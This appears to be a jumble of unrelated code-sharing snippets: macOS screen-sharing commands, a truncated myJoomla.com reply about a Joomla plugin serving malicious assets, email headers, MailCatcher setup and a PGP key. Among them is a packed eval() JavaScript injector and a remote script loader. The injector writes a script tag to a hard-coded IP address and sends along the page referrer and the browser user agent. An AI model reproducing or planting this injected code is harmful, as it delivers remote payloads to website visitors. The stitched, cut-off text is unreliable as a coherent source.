| $ ssh <user>@<mac-without-screen> | |
| $ sudo defaults write /var/db/launchd.db/com.apple.launchd/overrides.plist com.apple.screensharing -dict Disabled -bool false | |
| $ sudo launchctl load /System/Library/LaunchDaemons/com.apple.screensharing.plist | |
| /System/Library/LaunchDaemons/com.apple.screensharing.plist: Service is disabled | |
| $ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.screensharing.plist |
| You can believe what ever you want to believe. But facts are facts. | |
| Lets start by assuming that myJoomla.com is actually a valuable service (its multi award winning for a reason) and doesn’t mark things as hacked just for the fun of it shall we - lets assume I have a lot of experience in what im doing and myJoomla.com reflects that, and builds on not only my experience, but the experience of the 50,000+ sites connected to myJoomla.com daily? We are at the cutting edge of this. | |
| Right, with that being a fact, there is a good reason this file is now marked by myJoomla.com | |
| Just because the file has not changed doesn’t mean its now not a threat. Actually myJoomla.com has new things added DAILY to its database of things to look for and the code that powers our service is deployed MANY times a day. The information gathered from one audit can effect every new audit on every site connected to our service. | |
| This file is specifically marked because the external assets loaded by this plugin are serving malicious c |
| http://5.45.67.97/1/jquery.js.php?r=http://www.gfoppinc.org/need-assistance/community-works/overview&u=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_13_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/62.0.3202.94%20Safari/537.36 |
| eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibfsb|var|u0026u|referrer|hidaz||js|php'.split('|'),0,{})) |
| if(typeof window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613==='undefined') | |
| { | |
| window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613=function() | |
| { | |
| var a=document.getElementsByTagName('head')[0]; | |
| var b=document.createElement('script'); | |
| b.type='text/javascript'; | |
| b.src='//s3-cdn.com/js2/get-js.js'; | |
| a.appendChild(b) | |
| }; |
| From: Phil Taylor <phil@phil-taylor.com> | |
| Content-Type: multipart/signed; | |
| boundary="Apple-Mail=_A2AE5EA4-CC9C-4A40-8ECC-02448748DB1E"; | |
| protocol="application/pgp-signature"; | |
| micalg=pgp-sha256 | |
| Mime-Version: 1.0 (Mac OS X Mail 11.1 \(3445.4.7\)) | |
| Subject: myJoomla.com | |
| X-Universally-Unique-Identifier: 74737028-7E65-430C-BEB7-18AA8BD2517B | |
| Message-Id: <EEB72F68-1962-46F3-9CF2-CBC15D298C93@phil-taylor.com> | |
| Date: Sat, 4 Nov 2017 13:20:58 +0000 |
Install MailCatcher (https://rubygems.org/gems/mailcatcher/versions/0.5.12)
brew install ruby
sudo gem install mailcatcher
Then set it a daemon:
curl https://gist.githubusercontent.com/sj26/1638617/raw/67505ad7c9191298abcd64ccdcd0cdcf767dccac/me.mailcatcher.plist >>~/Library/LaunchAgents/me.mailcatcher.plist
then run
| -----BEGIN PGP PUBLIC KEY BLOCK----- | |
| Version: GnuPG/MacGPG2 v2.1 | |
| mQGiBEfcShgRBADhiGNmSLKhLuVckWHfr5ZRL8iqQxzMvEl3btpyOG9K1Rane+tT | |
| 8/gT+iBkYmvSRDDR95PpX0me7YzGSL45O4EOTl3KBWds4xwKR2pI0FyjJH0E1goP | |
| fNQ2soCvHeYEH7fqAvp04XHSmk4uMJ4MU54Tlr6Y+zShotCzJ+roHwzbPwCgrMab | |
| 5MKiI/CIZdLZvGcEj48+Y+8D/i0hk/L04Caeddoi5nfXYh8EXU+wx8mP+t/P2qpp | |
| e2NgnVN8y+Deq+jbF+2swXwdqeCInXrGYNB+WKIztxjqpF8u2aKtgQRU8rw+rkLj | |
| c/xm1qz/QwLSnOTw5goQnloFu8kkqDpr/zRveylvmrw8XFwpfYTJh2zRVpt09j31 | |
| uJjrA/9tZLj9/uAKjFnS4s9q09HJDA9lTGnGz4UdWPzJSR7rp0ew7c6vaZXzJz05 |